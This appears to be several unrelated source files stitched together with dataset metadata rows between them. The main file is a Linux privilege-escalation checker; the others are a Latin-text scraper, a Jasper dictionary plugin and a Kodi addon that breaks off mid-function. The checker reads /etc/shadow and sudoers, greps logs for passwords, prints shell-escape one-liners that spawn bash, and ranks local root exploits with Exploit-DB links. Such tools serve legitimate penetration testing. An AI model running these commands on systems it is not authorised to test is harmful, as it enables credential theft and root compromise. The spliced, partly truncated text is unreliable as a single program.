gpl-3.0
| 8,279,968,937,901,342,000
| 19.121951
| 115
| 0.446869
| false
| 4.02439
| false
| false
| false
|
blindfuzzy/LHF
|
Tools/linuxprivchk.py
|
1
|
25080
|
#!/usr/bin/env python
###############################################################################################################
## [Title]: linuxprivchecker.py -- a Linux Privilege Escalation Check Script
## [Author]: Mike Czumak (T_v3rn1x) -- @SecuritySift
##-------------------------------------------------------------------------------------------------------------
## [Details]:
## This script is intended to be executed locally on a Linux box to enumerate basic system info and
## search for common privilege escalation vectors such as world writable files, misconfigurations, clear-text
## passwords and applicable exploits.
##-------------------------------------------------------------------------------------------------------------
## [Warning]:
## This script comes as-is with no promise of functionality or accuracy. I have no plans to maintain updates,
## I did not write it to be efficient and in some cases you may find the functions may not produce the desired
## results. For example, the function that links packages to running processes is based on keywords and will
## not always be accurate. Also, the exploit list included in this function will need to be updated over time.
## Feel free to change or improve it any way you see fit.
##-------------------------------------------------------------------------------------------------------------
## [Modification, Distribution, and Attribution]:
## You are free to modify and/or distribute this script as you wish. I only ask that you maintain original
## author attribution and not attempt to sell it or incorporate it into any commercial offering (as if it's
## worth anything anyway :)
###############################################################################################################
# conditional import for older versions of python not compatible with subprocess
try:
import subprocess as sub
compatmode = 0 # newer version of python, no need for compatibility mode
except ImportError:
import os # older version of python, need to use os instead
compatmode = 1
# title / formatting
bigline = "================================================================================================="
smlline = "-------------------------------------------------------------------------------------------------"
print bigline
print "LINUX PRIVILEGE ESCALATION CHECKER"
print bigline
print
# loop through dictionary, execute the commands, store the results, return updated dict
def execCmd(cmdDict):
for item in cmdDict:
cmd = cmdDict[item]["cmd"]
if compatmode == 0: # newer version of python, use preferred subprocess
out, error = sub.Popen([cmd], stdout=sub.PIPE, stderr=sub.PIPE, shell=True).communicate()
results = out.split('\n')
else: # older version of python, use os.popen
echo_stdout = os.popen(cmd, 'r')
results = echo_stdout.read().split('\n')
cmdDict[item]["results"]=results
return cmdDict
# print results for each previously executed command, no return value
def printResults(cmdDict):
for item in cmdDict:
msg = cmdDict[item]["msg"]
results = cmdDict[item]["results"]
print "[+] " + msg
for result in results:
if result.strip() != "":
print " " + result.strip()
print
return
def writeResults(msg, results):
f = open("privcheckout.txt", "a");
f.write("[+] " + str(len(results)-1) + " " + msg)
for result in results:
if result.strip() != "":
f.write(" " + result.strip())
f.close()
return
# Basic system info
print "[*] GETTING BASIC SYSTEM INFO...\n"
results=[]
sysInfo = {"OS":{"cmd":"cat /etc/issue","msg":"Operating System","results":results},
"KERNEL":{"cmd":"cat /proc/version","msg":"Kernel","results":results},
"HOSTNAME":{"cmd":"hostname", "msg":"Hostname", "results":results}
}
sysInfo = execCmd(sysInfo)
printResults(sysInfo)
# Networking Info
print "[*] GETTING NETWORKING INFO...\n"
netInfo = {"NETINFO":{"cmd":"/sbin/ifconfig -a", "msg":"Interfaces", "results":results},
"ROUTE":{"cmd":"route", "msg":"Route", "results":results},
"NETSTAT":{"cmd":"netstat -antup | grep -v 'TIME_WAIT'", "msg":"Netstat", "results":results}
}
netInfo = execCmd(netInfo)
printResults(netInfo)
# File System Info
print "[*] GETTING FILESYSTEM INFO...\n"
driveInfo = {"MOUNT":{"cmd":"mount","msg":"Mount results", "results":results},
"FSTAB":{"cmd":"cat /etc/fstab 2>/dev/null", "msg":"fstab entries", "results":results}
}
driveInfo = execCmd(driveInfo)
printResults(driveInfo)
# Scheduled Cron Jobs
cronInfo = {"CRON":{"cmd":"ls -la /etc/cron* 2>/dev/null", "msg":"Scheduled cron jobs", "results":results},
"CRONW": {"cmd":"ls -aRl /etc/cron* 2>/dev/null | awk '$1 ~ /w.$/' 2>/dev/null", "msg":"Writable cron dirs", "results":results}
}
cronInfo = execCmd(cronInfo)
printResults(cronInfo)
# User Info
print "\n[*] ENUMERATING USER AND ENVIRONMENTAL INFO...\n"
userInfo = {"WHOAMI":{"cmd":"whoami", "msg":"Current User", "results":results},
"ID":{"cmd":"id","msg":"Current User ID", "results":results},
"ALLUSERS":{"cmd":"cat /etc/passwd", "msg":"All users", "results":results},
"SUPUSERS":{"cmd":"grep -v -E '^#' /etc/passwd | awk -F: '$3 == 0{print $1}'", "msg":"Super Users Found:", "results":results},
"HISTORY":{"cmd":"ls -la ~/.*_history; ls -la /root/.*_history 2>/dev/null", "msg":"Root and current user history (depends on privs)", "results":results},
"ENV":{"cmd":"env 2>/dev/null | grep -v 'LS_COLORS'", "msg":"Environment", "results":results},
"SUDOERS":{"cmd":"cat /etc/sudoers 2>/dev/null | grep -v '#' 2>/dev/null", "msg":"Sudoers (privileged)", "results":results},
"LOGGEDIN":{"cmd":"w 2>/dev/null", "msg":"Logged in User Activity", "results":results}
}
userInfo = execCmd(userInfo)
printResults(userInfo)
if "root" in userInfo["ID"]["results"][0]:
print "[!] ARE YOU SURE YOU'RE NOT ROOT ALREADY?\n"
# File/Directory Privs
print "[*] ENUMERATING FILE AND DIRECTORY PERMISSIONS/CONTENTS...\n"
fdPerms = {"WWDIRSROOT":{"cmd":"find / \( -wholename '/home/homedir*' -prune \) -o \( -type d -perm -0002 \) -exec ls -ld '{}' ';' 2>/dev/null | grep root", "msg":"World Writeable Directories for User/Group 'Root'", "results":results},
"WWDIRS":{"cmd":"find / \( -wholename '/home/homedir*' -prune \) -o \( -type d -perm -0002 \) -exec ls -ld '{}' ';' 2>/dev/null | grep -v root", "msg":"World Writeable Directories for Users other than Root", "results":results},
"WWFILES":{"cmd":"find / \( -wholename '/home/homedir/*' -prune -o -wholename '/proc/*' -prune \) -o \( -type f -perm -0002 \) -exec ls -l '{}' ';' 2>/dev/null", "msg":"World Writable Files", "results":results},
"SUID":{"cmd":"find / \( -perm -2000 -o -perm -4000 \) -exec ls -ld {} \; 2>/dev/null", "msg":"SUID/SGID Files and Directories", "results":results},
"ROOTHOME":{"cmd":"ls -ahlR /root 2>/dev/null", "msg":"Checking if root's home folder is accessible", "results":results}
}
fdPerms = execCmd(fdPerms)
printResults(fdPerms)
pwdFiles = {"LOGPWDS":{"cmd":"find /var/log -name '*.log' 2>/dev/null | xargs -l10 egrep 'pwd|password' 2>/dev/null", "msg":"Logs containing keyword 'password'", "results":results},
"CONFPWDS":{"cmd":"find /etc -name '*.c*' 2>/dev/null | xargs -l10 egrep 'pwd|password' 2>/dev/null", "msg":"Config files containing keyword 'password'", "results":results},
"SHADOW":{"cmd":"cat /etc/shadow 2>/dev/null", "msg":"Shadow File (Privileged)", "results":results}
}
pwdFiles = execCmd(pwdFiles)
printResults(pwdFiles)
# Processes and Applications
print "[*] ENUMERATING PROCESSES AND APPLICATIONS...\n"
if "debian" in sysInfo["KERNEL"]["results"][0] or "ubuntu" in sysInfo["KERNEL"]["results"][0]:
getPkgs = "dpkg -l | awk '{$1=$4=\"\"; print $0}'" # debian
else:
getPkgs = "rpm -qa | sort -u" # RH/other
getAppProc = {"PROCS":{"cmd":"ps aux | awk '{print $1,$2,$9,$10,$11}'", "msg":"Current processes", "results":results},
"PKGS":{"cmd":getPkgs, "msg":"Installed Packages", "results":results}
}
getAppProc = execCmd(getAppProc)
printResults(getAppProc) # comment to reduce output
otherApps = { "SUDO":{"cmd":"sudo -V | grep version 2>/dev/null", "msg":"Sudo Version (Check out http://www.exploit-db.com/search/?action=search&filter_page=1&filter_description=sudo)", "results":results},
"APACHE":{"cmd":"apache2 -v; apache2ctl -M; httpd -v; apachectl -l 2>/dev/null", "msg":"Apache Version and Modules", "results":results},
"APACHECONF":{"cmd":"cat /etc/apache2/apache2.conf 2>/dev/null", "msg":"Apache Config File", "results":results}
}
otherApps = execCmd(otherApps)
printResults(otherApps)
print "[*] IDENTIFYING PROCESSES AND PACKAGES RUNNING AS ROOT OR OTHER SUPERUSER...\n"
# find the package information for the processes currently running
# under root or another super user
procs = getAppProc["PROCS"]["results"]
pkgs = getAppProc["PKGS"]["results"]
supusers = userInfo["SUPUSERS"]["results"]
procdict = {} # dictionary to hold the processes running as super users
for proc in procs: # loop through each process
relatedpkgs = [] # list to hold the packages related to a process
try:
for user in supusers: # loop through the known super users
if (user != "") and (user in proc): # if the process is being run by a super user
procname = proc.split(" ")[4] # grab the process name
if "/" in procname:
splitname = procname.split("/")
procname = splitname[len(splitname)-1]
for pkg in pkgs: # loop through the packages
if not len(procname) < 3: # name too short to get reliable package results
if procname in pkg:
if procname in procdict:
relatedpkgs = procdict[proc] # if already in the dict, grab its pkg list
if pkg not in relatedpkgs:
relatedpkgs.append(pkg) # add pkg to the list
procdict[proc]=relatedpkgs # add any found related packages to the process dictionary entry
except:
pass
for key in procdict:
print " " + key # print the process name
try:
if not procdict[key][0] == "": # only print the rest if related packages were found
print " Possible Related Packages: "
for entry in procdict[key]:
print " " + entry # print each related package
except:
pass
# EXPLOIT ENUMERATION
# First discover the available tools
print
print "[*] ENUMERATING INSTALLED LANGUAGES/TOOLS FOR SPLOIT BUILDING...\n"
devTools = {"TOOLS":{"cmd":"which awk perl python ruby gcc cc vi vim nmap find netcat nc wget tftp ftp 2>/dev/null", "msg":"Installed Tools", "results":results}}
devTools = execCmd(devTools)
printResults(devTools)
print "[+] Related Shell Escape Sequences...\n"
escapeCmd = {"vi":[":!bash", ":set shell=/bin/bash:shell"], "awk":["awk 'BEGIN {system(\"/bin/bash\")}'"], "perl":["perl -e 'exec \"/bin/bash\";'"], "find":["find / -exec /usr/bin/awk 'BEGIN {system(\"/bin/bash\")}' \\;"], "nmap":["--interactive"]}
for cmd in escapeCmd:
for result in devTools["TOOLS"]["results"]:
if cmd in result:
for item in escapeCmd[cmd]:
print " " + cmd + "-->\t" + item
print
print "[*] FINDING RELEVENT PRIVILEGE ESCALATION EXPLOITS...\n"
# Now check for relevant exploits (note: this list should be updated over time; source: Exploit-DB)
# sploit format = sploit name : {minversion, maxversion, exploitdb#, language, {keywords for applicability}} -- current keywords are 'kernel', 'proc', 'pkg' (unused), and 'os'
sploits= { "2.2.x-2.4.x ptrace kmod local exploit":{"minver":"2.2", "maxver":"2.4.99", "exploitdb":"3", "lang":"c", "keywords":{"loc":["kernel"], "val":"kernel"}},
"< 2.4.20 Module Loader Local Root Exploit":{"minver":"0", "maxver":"2.4.20", "exploitdb":"12", "lang":"c", "keywords":{"loc":["kernel"], "val":"kernel"}},
"2.4.22 "'do_brk()'" local Root Exploit (PoC)":{"minver":"2.4.22", "maxver":"2.4.22", "exploitdb":"129", "lang":"asm", "keywords":{"loc":["kernel"], "val":"kernel"}},
"<= 2.4.22 (do_brk) Local Root Exploit (working)":{"minver":"0", "maxver":"2.4.22", "exploitdb":"131", "lang":"c", "keywords":{"loc":["kernel"], "val":"kernel"}},
"2.4.x mremap() bound checking Root Exploit":{"minver":"2.4", "maxver":"2.4.99", "exploitdb":"145", "lang":"c", "keywords":{"loc":["kernel"], "val":"kernel"}},
"<= 2.4.29-rc2 uselib() Privilege Elevation":{"minver":"0", "maxver":"2.4.29", "exploitdb":"744", "lang":"c", "keywords":{"loc":["kernel"], "val":"kernel"}},
"2.4 uselib() Privilege Elevation Exploit":{"minver":"2.4", "maxver":"2.4", "exploitdb":"778", "lang":"c", "keywords":{"loc":["kernel"], "val":"kernel"}},
"2.4.x / 2.6.x uselib() Local Privilege Escalation Exploit":{"minver":"2.4", "maxver":"2.6.99", "exploitdb":"895", "lang":"c", "keywords":{"loc":["kernel"], "val":"kernel"}},
"2.4/2.6 bluez Local Root Privilege Escalation Exploit (update)":{"minver":"2.4", "maxver":"2.6.99", "exploitdb":"926", "lang":"c", "keywords":{"loc":["proc","pkg"], "val":"bluez"}},
"<= 2.6.11 (CPL 0) Local Root Exploit (k-rad3.c)":{"minver":"0", "maxver":"2.6.11", "exploitdb":"1397", "lang":"c", "keywords":{"loc":["kernel"], "val":"kernel"}},
"MySQL 4.x/5.0 User-Defined Function Local Privilege Escalation Exploit":{"minver":"0", "maxver":"99", "exploitdb":"1518", "lang":"c", "keywords":{"loc":["proc","pkg"], "val":"mysql"}},
"2.6.13 <= 2.6.17.4 sys_prctl() Local Root Exploit":{"minver":"2.6.13", "maxver":"2.6.17.4", "exploitdb":"2004", "lang":"c", "keywords":{"loc":["kernel"], "val":"kernel"}},
"2.6.13 <= 2.6.17.4 sys_prctl() Local Root Exploit (2)":{"minver":"2.6.13", "maxver":"2.6.17.4", "exploitdb":"2005", "lang":"c", "keywords":{"loc":["kernel"], "val":"kernel"}},
"2.6.13 <= 2.6.17.4 sys_prctl() Local Root Exploit (3)":{"minver":"2.6.13", "maxver":"2.6.17.4", "exploitdb":"2006", "lang":"c", "keywords":{"loc":["kernel"], "val":"kernel"}},
"2.6.13 <= 2.6.17.4 sys_prctl() Local Root Exploit (4)":{"minver":"2.6.13", "maxver":"2.6.17.4", "exploitdb":"2011", "lang":"sh", "keywords":{"loc":["kernel"], "val":"kernel"}},
"<= 2.6.17.4 (proc) Local Root Exploit":{"minver":"0", "maxver":"2.6.17.4", "exploitdb":"2013", "lang":"c", "keywords":{"loc":["kernel"], "val":"kernel"}},
"2.6.13 <= 2.6.17.4 prctl() Local Root Exploit (logrotate)":{"minver":"2.6.13", "maxver":"2.6.17.4", "exploitdb":"2031", "lang":"c", "keywords":{"loc":["kernel"], "val":"kernel"}},
"Ubuntu/Debian Apache 1.3.33/1.3.34 (CGI TTY) Local Root Exploit":{"minver":"4.10", "maxver":"7.04", "exploitdb":"3384", "lang":"c", "keywords":{"loc":["os"], "val":"debian"}},
"Linux/Kernel 2.4/2.6 x86-64 System Call Emulation Exploit":{"minver":"2.4", "maxver":"2.6", "exploitdb":"4460", "lang":"c", "keywords":{"loc":["kernel"], "val":"kernel"}},
"< 2.6.11.5 BLUETOOTH Stack Local Root Exploit":{"minver":"0", "maxver":"2.6.11.5", "exploitdb":"4756", "lang":"c", "keywords":{"loc":["proc","pkg"], "val":"bluetooth"}},
"2.6.17 - 2.6.24.1 vmsplice Local Root Exploit":{"minver":"2.6.17", "maxver":"2.6.24.1", "exploitdb":"5092", "lang":"c", "keywords":{"loc":["kernel"], "val":"kernel"}},
"2.6.23 - 2.6.24 vmsplice Local Root Exploit":{"minver":"2.6.23", "maxver":"2.6.24", "exploitdb":"5093", "lang":"c", "keywords":{"loc":["os"], "val":"debian"}},
"Debian OpenSSL Predictable PRNG Bruteforce SSH Exploit":{"minver":"0", "maxver":"99", "exploitdb":"5720", "lang":"python", "keywords":{"loc":["os"], "val":"debian"}},
"Linux Kernel < 2.6.22 ftruncate()/open() Local Exploit":{"minver":"0", "maxver":"2.6.22", "exploitdb":"6851", "lang":"c", "keywords":{"loc":["kernel"], "val":"kernel"}},
"< 2.6.29 exit_notify() Local Privilege Escalation Exploit":{"minver":"0", "maxver":"2.6.29", "exploitdb":"8369", "lang":"c", "keywords":{"loc":["kernel"], "val":"kernel"}},
"2.6 UDEV Local Privilege Escalation Exploit":{"minver":"2.6", "maxver":"2.6.99", "exploitdb":"8478", "lang":"c", "keywords":{"loc":["proc","pkg"], "val":"udev"}},
"2.6 UDEV < 141 Local Privilege Escalation Exploit":{"minver":"2.6", "maxver":"2.6.99", "exploitdb":"8572", "lang":"c", "keywords":{"loc":["proc","pkg"], "val":"udev"}},
"2.6.x ptrace_attach Local Privilege Escalation Exploit":{"minver":"2.6", "maxver":"2.6.99", "exploitdb":"8673", "lang":"c", "keywords":{"loc":["kernel"], "val":"kernel"}},
"2.6.29 ptrace_attach() Local Root Race Condition Exploit":{"minver":"2.6.29", "maxver":"2.6.29", "exploitdb":"8678", "lang":"c", "keywords":{"loc":["kernel"], "val":"kernel"}},
"Linux Kernel <=2.6.28.3 set_selection() UTF-8 Off By One Local Exploit":{"minver":"0", "maxver":"2.6.28.3", "exploitdb":"9083", "lang":"c", "keywords":{"loc":["kernel"], "val":"kernel"}},
"Test Kernel Local Root Exploit 0day":{"minver":"2.6.18", "maxver":"2.6.30", "exploitdb":"9191", "lang":"c", "keywords":{"loc":["kernel"], "val":"kernel"}},
"PulseAudio (setuid) Priv. Escalation Exploit (ubu/9.04)(slack/12.2.0)":{"minver":"2.6.9", "maxver":"2.6.30", "exploitdb":"9208", "lang":"c", "keywords":{"loc":["pkg"], "val":"pulse"}},
"2.x sock_sendpage() Local Ring0 Root Exploit":{"minver":"2", "maxver":"2.99", "exploitdb":"9435", "lang":"c", "keywords":{"loc":["kernel"], "val":"kernel"}},
"2.x sock_sendpage() Local Root Exploit 2":{"minver":"2", "maxver":"2.99", "exploitdb":"9436", "lang":"c", "keywords":{"loc":["kernel"], "val":"kernel"}},
"2.4/2.6 sock_sendpage() ring0 Root Exploit (simple ver)":{"minver":"2.4", "maxver":"2.6.99", "exploitdb":"9479", "lang":"c", "keywords":{"loc":["kernel"], "val":"kernel"}},
"2.6 < 2.6.19 (32bit) ip_append_data() ring0 Root Exploit":{"minver":"2.6", "maxver":"2.6.19", "exploitdb":"9542", "lang":"c", "keywords":{"loc":["kernel"], "val":"kernel"}},
"2.4/2.6 sock_sendpage() Local Root Exploit (ppc)":{"minver":"2.4", "maxver":"2.6.99", "exploitdb":"9545", "lang":"c", "keywords":{"loc":["kernel"], "val":"kernel"}},
"< 2.6.19 udp_sendmsg Local Root Exploit (x86/x64)":{"minver":"0", "maxver":"2.6.19", "exploitdb":"9574", "lang":"c", "keywords":{"loc":["kernel"], "val":"kernel"}},
"< 2.6.19 udp_sendmsg Local Root Exploit":{"minver":"0", "maxver":"2.6.19", "exploitdb":"9575", "lang":"c", "keywords":{"loc":["kernel"], "val":"kernel"}},
"2.4/2.6 sock_sendpage() Local Root Exploit [2]":{"minver":"2.4", "maxver":"2.6.99", "exploitdb":"9598", "lang":"c", "keywords":{"loc":["kernel"], "val":"kernel"}},
"2.4/2.6 sock_sendpage() Local Root Exploit [3]":{"minver":"2.4", "maxver":"2.6.99", "exploitdb":"9641", "lang":"c", "keywords":{"loc":["kernel"], "val":"kernel"}},
"2.4.1-2.4.37 and 2.6.1-2.6.32-rc5 Pipe.c Privelege Escalation":{"minver":"2.4.1", "maxver":"2.6.32", "exploitdb":"9844", "lang":"python", "keywords":{"loc":["kernel"], "val":"kernel"}},
"'pipe.c' Local Privilege Escalation Vulnerability":{"minver":"2.4.1", "maxver":"2.6.32", "exploitdb":"10018", "lang":"sh", "keywords":{"loc":["kernel"], "val":"kernel"}},
"2.6.18-20 2009 Local Root Exploit":{"minver":"2.6.18", "maxver":"2.6.20", "exploitdb":"10613", "lang":"c", "keywords":{"loc":["kernel"], "val":"kernel"}},
"Apache Spamassassin Milter Plugin Remote Root Command Execution":{"minver":"0", "maxver":"99", "exploitdb":"11662", "lang":"sh", "keywords":{"loc":["proc"], "val":"spamass-milter"}},
"<= 2.6.34-rc3 ReiserFS xattr Privilege Escalation":{"minver":"0", "maxver":"2.6.34", "exploitdb":"12130", "lang":"python", "keywords":{"loc":["mnt"], "val":"reiser"}},
"Ubuntu PAM MOTD local root":{"minver":"7", "maxver":"10.04", "exploitdb":"14339", "lang":"sh", "keywords":{"loc":["os"], "val":"ubuntu"}},
"< 2.6.36-rc1 CAN BCM Privilege Escalation Exploit":{"minver":"0", "maxver":"2.6.36", "exploitdb":"14814", "lang":"c", "keywords":{"loc":["kernel"], "val":"kernel"}},
"Kernel ia32syscall Emulation Privilege Escalation":{"minver":"0", "maxver":"99", "exploitdb":"15023", "lang":"c", "keywords":{"loc":["kernel"], "val":"kernel"}},
"Linux RDS Protocol Local Privilege Escalation":{"minver":"0", "maxver":"2.6.36", "exploitdb":"15285", "lang":"c", "keywords":{"loc":["kernel"], "val":"kernel"}},
"<= 2.6.37 Local Privilege Escalation":{"minver":"0", "maxver":"2.6.37", "exploitdb":"15704", "lang":"c", "keywords":{"loc":["kernel"], "val":"kernel"}},
"< 2.6.37-rc2 ACPI custom_method Privilege Escalation":{"minver":"0", "maxver":"2.6.37", "exploitdb":"15774", "lang":"c", "keywords":{"loc":["kernel"], "val":"kernel"}},
"CAP_SYS_ADMIN to root Exploit":{"minver":"0", "maxver":"99", "exploitdb":"15916", "lang":"c", "keywords":{"loc":["kernel"], "val":"kernel"}},
"CAP_SYS_ADMIN to Root Exploit 2 (32 and 64-bit)":{"minver":"0", "maxver":"99", "exploitdb":"15944", "lang":"c", "keywords":{"loc":["kernel"], "val":"kernel"}},
"< 2.6.36.2 Econet Privilege Escalation Exploit":{"minver":"0", "maxver":"2.6.36.2", "exploitdb":"17787", "lang":"c", "keywords":{"loc":["kernel"], "val":"kernel"}},
"Sendpage Local Privilege Escalation":{"minver":"0", "maxver":"99", "exploitdb":"19933", "lang":"ruby", "keywords":{"loc":["kernel"], "val":"kernel"}},
"2.4.18/19 Privileged File Descriptor Resource Exhaustion Vulnerability":{"minver":"2.4.18", "maxver":"2.4.19", "exploitdb":"21598", "lang":"c", "keywords":{"loc":["kernel"], "val":"kernel"}},
"2.2.x/2.4.x Privileged Process Hijacking Vulnerability (1)":{"minver":"2.2", "maxver":"2.4.99", "exploitdb":"22362", "lang":"c", "keywords":{"loc":["kernel"], "val":"kernel"}},
"2.2.x/2.4.x Privileged Process Hijacking Vulnerability (2)":{"minver":"2.2", "maxver":"2.4.99", "exploitdb":"22363", "lang":"c", "keywords":{"loc":["kernel"], "val":"kernel"}},
"Samba 2.2.8 Share Local Privilege Elevation Vulnerability":{"minver":"2.2.8", "maxver":"2.2.8", "exploitdb":"23674", "lang":"c", "keywords":{"loc":["proc","pkg"], "val":"samba"}},
"open-time Capability file_ns_capable() Privilege Escalation":{"minver":"0", "maxver":"99", "exploitdb":"25450", "lang":"c", "keywords":{"loc":["kernel"], "val":"kernel"}},
}
# variable declaration
os = sysInfo["OS"]["results"][0]
version = sysInfo["KERNEL"]["results"][0].split(" ")[2].split("-")[0]
langs = devTools["TOOLS"]["results"]
procs = getAppProc["PROCS"]["results"]
kernel = str(sysInfo["KERNEL"]["results"][0])
mount = driveInfo["MOUNT"]["results"]
#pkgs = getAppProc["PKGS"]["results"] # currently not using packages for sploit applicability but may in future
# lists to hold ranked, applicable sploits
# note: this is a best-effort, basic ranking designed to help in prioritizing priv escalation exploit checks
# all applicable exploits should be checked and this function could probably use some improvement
avgprob = []
highprob = []
for sploit in sploits:
lang = 0 # use to rank applicability of sploits
keyword = sploits[sploit]["keywords"]["val"]
sploitout = sploit + " || " + "http://www.exploit-db.com/exploits/" + sploits[sploit]["exploitdb"] + " || " + "Language=" + sploits[sploit]["lang"]
    # first check for kernel applicability
if (version >= sploits[sploit]["minver"]) and (version <= sploits[sploit]["maxver"]):
# next check language applicability
if (sploits[sploit]["lang"] == "c") and (("gcc" in str(langs)) or ("cc" in str(langs))):
lang = 1 # language found, increase applicability score
elif sploits[sploit]["lang"] == "sh":
lang = 1 # language found, increase applicability score
elif (sploits[sploit]["lang"] in str(langs)):
lang = 1 # language found, increase applicability score
if lang == 0:
sploitout = sploitout + "**" # added mark if language not detected on system
# next check keyword matches to determine if some sploits have a higher probability of success
for loc in sploits[sploit]["keywords"]["loc"]:
if loc == "proc":
for proc in procs:
if keyword in proc:
highprob.append(sploitout) # if sploit is associated with a running process consider it a higher probability/applicability
break
break
elif loc == "os":
if (keyword in os) or (keyword in kernel):
highprob.append(sploitout) # if sploit is specifically applicable to this OS consider it a higher probability/applicability
break
elif loc == "mnt":
if keyword in mount:
highprob.append(sploitout) # if sploit is specifically applicable to a mounted file system consider it a higher probability/applicability
break
else:
avgprob.append(sploitout) # otherwise, consider average probability/applicability based only on kernel version
print " Note: Exploits relying on a compile/scripting language not detected on this system are marked with a '**' but should still be tested!"
print
print " The following exploits are ranked higher in probability of success because this script detected a related running process, OS, or mounted file system"
for exploit in highprob:
print " - " + exploit
print
print " The following exploits are applicable to this kernel version and should be investigated as well"
for exploit in avgprob:
print " - " + exploit
print
print "Finished"
print bigline
|
gpl-3.0
| 6,533,771,653,508,868,000
| 66.601078
| 248
| 0.614872
| false
| 3.089431
| false
| false
| false
|
oudalab/phyllo
|
phyllo/extractors/regula_ad_monachoDB.py
|
1
|
3765
|
import sqlite3
import urllib
import re
from urllib.request import urlopen
from bs4 import BeautifulSoup
# several names in the <pagehead> but not sure what to put as an author name
def main():
# The collection URL below.
collURL = 'http://www.thelatinlibrary.com/regula.html'
collOpen = urllib.request.urlopen(collURL)
collSOUP = BeautifulSoup(collOpen, 'html5lib')
author = "unknown"
colltitle = collSOUP.title.string.strip()
date = "no date found"
textsURL = [collURL]
with sqlite3.connect('texts.db') as db:
c = db.cursor()
c.execute(
'CREATE TABLE IF NOT EXISTS texts (id INTEGER PRIMARY KEY, title TEXT, book TEXT,'
' language TEXT, author TEXT, date TEXT, chapter TEXT, verse TEXT, passage TEXT,'
' link TEXT, documentType TEXT)')
c.execute("DELETE FROM texts WHERE title = 'REGULA AD MONACHOS I'")
c.execute("DELETE FROM texts WHERE title = 'SS. PATRUM REGULA AD MONACHOS II.'")
c.execute("DELETE FROM texts WHERE title = 'SS. PATRUM REGULA AD MONACHOS III.'")
c.execute("DELETE FROM texts WHERE title = 'REGULA ORIENTALIS\nEX PATRUM ORIENTALIUM REGULIS COLLECTA'")
for url in textsURL:
chapter = "Preface"
verse = 0
title = "REGULA AD MONACHOS I"
openurl = urllib.request.urlopen(url)
textsoup = BeautifulSoup(openurl, 'html5lib')
getp = textsoup.find_all('p')
for p in getp:
# make sure it's not a paragraph without the main text
try:
if p['class'][0].lower() in ['border', 'pagehead', 'shortborder', 'smallborder', 'margin',
                                                 'internal_navigation']: # these are not part of the main text
continue
except:
pass
verses = []
text = p.get_text()
text = text.strip()
if p.find('b') is not None:
if text.startswith("SS.") or text.startswith("REGULA"):
# this is the title of a new work
title = text
chapter = -1
continue
else:
if text.startswith("CAPUT"):
chapter = text
print(chapter)
verse = 0
continue
else:
chapter = chapter + ": " + text
continue
if title == "REGULA AD MONACHOS I":
verses.append(text)
elif text.startswith("PRAEFATIO"):
chapter = text
verse = 0
continue
elif re.match('[IVXL]+\.', text):
chapter = text.split(" ")[0].strip()
print(chapter)
verse = 0
text = text.replace(chapter, '')
verses.append(text)
else:
verses.append(text)
for v in verses:
if v.startswith('Christian'):
continue
if v is None or v == '' or v.isspace():
continue
# verse number assignment.
verse += 1
c.execute("INSERT INTO texts VALUES (?,?,?,?,?,?,?, ?, ?, ?, ?)",
(None, colltitle, title, 'Latin', author, date, chapter,
verse, v, url, 'prose'))
if __name__ == '__main__':
main()
|
apache-2.0
| 730,117,628,980,353,400
| 36.277228
| 112
| 0.468526
| false
| 4.585871
| false
| false
| false
|
iamjake648/jasper-dictionary
|
Define.py
|
1
|
1593
|
#Written by Jake Schultz
#TODO Add more lang support, limit number of results returned
import re
from urllib2 import Request, urlopen, URLError
import json
WORDS = ["DEFINE","WHAT DOES %S MEAN","DEFINITION", "WHAT IS [A|AN]? %S"]
PRIORITY = 1
def handle(text, mic, profile, recursive=False):
text = re.sub(r"(?i)(define|(what is the\s)?definition of|what does|mean|what is (a|an)?)\b","", text ).strip()
if len(text) != 0:
#Yandex Dictionary API Key
dict_key = profile['keys']['YANDEX_DICT']
#method to get the def
get_def(text,mic,dict_key)
elif not recursive:
mic.say("What word would you like to define?")
handle(mic.activeListen(), mic, profile, True)
def get_def(text,mic,key):
#make a call to the API
request = Request('https://dictionary.yandex.net/api/v1/dicservice.json/lookup?key='+key+'&lang=en-en&text='+text)
try:
response = urlopen(request)
data = json.load(response)
if len(data["def"]) == 0:
mic.say("I could not find a definition for " + str(text))
else:
#get the word type (noun, verb, ect)
word_type = data["def"][0]["pos"]
mic.say("The word is a " + word_type)
defs = data["def"][0]["tr"]
#loop through the definitions
for text in defs:
mic.say(text["text"])
except URLError, e:
mic.say("Unable to reach dictionary API.")
def isValid(text):
return bool(re.search(r'\Define|what does\s(.*?)\smean|Definition|what is\s\w+\b',text, re.IGNORECASE))
|
gpl-2.0
| 1,097,689,116,695,614,700
| 34.4
| 118
| 0.603264
| false
| 3.346639
| false
| false
| false
|
felipenaselva/repo.felipe
|
plugin.video.uwc/k18.py
|
1
|
2513
|
'''
Ultimate Whitecream
Copyright (C) 2015 mortael
This program is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program. If not, see <http://www.gnu.org/licenses/>.
'''
import urllib, urllib2, re, cookielib, os.path, sys, socket
import xbmc, xbmcplugin, xbmcgui, xbmcaddon
import utils
#230: k18.Main()
#231: k18.List(url)
#232: k18.Playvid(url, name, download)
#233: k18.Cat(url)
#234: k18.Search(url, keyword)
progress = utils.progress
def Main():
utils.addDir('[COLOR hotpink]Categories[/COLOR]','http://k18.co/',233,'','')
utils.addDir('[COLOR hotpink]Search[/COLOR]','http://k18.co/?s=',234,'','')
List('http://k18.co/page/1/')
xbmcplugin.endOfDirectory(utils.addon_handle)
def List(url):
listhtml = utils.getHtml(url, '')
match = re.compile(r'class="content-list-thumb">\s+<a href="([^"]+)" title="([^"]+)">.*?src="([^"]+)"', re.DOTALL | re.IGNORECASE).findall(listhtml)
for videopage, name, img in match:
name = utils.cleantext(name)
utils.addDownLink(name, videopage, 232, img, '')
try:
nextp=re.compile('next page-numbers" href="([^"]+)">»', re.DOTALL | re.IGNORECASE).findall(listhtml)[0]
utils.addDir('Next Page', nextp, 231,'')
except: pass
xbmcplugin.endOfDirectory(utils.addon_handle)
def Search(url, keyword=None):
searchUrl = url
if not keyword:
utils.searchDir(url, 234)
else:
title = keyword.replace(' ','+')
searchUrl = searchUrl + title
print "Searching URL: " + searchUrl
List(searchUrl)
def Cat(url):
cathtml = utils.getHtml(url, '')
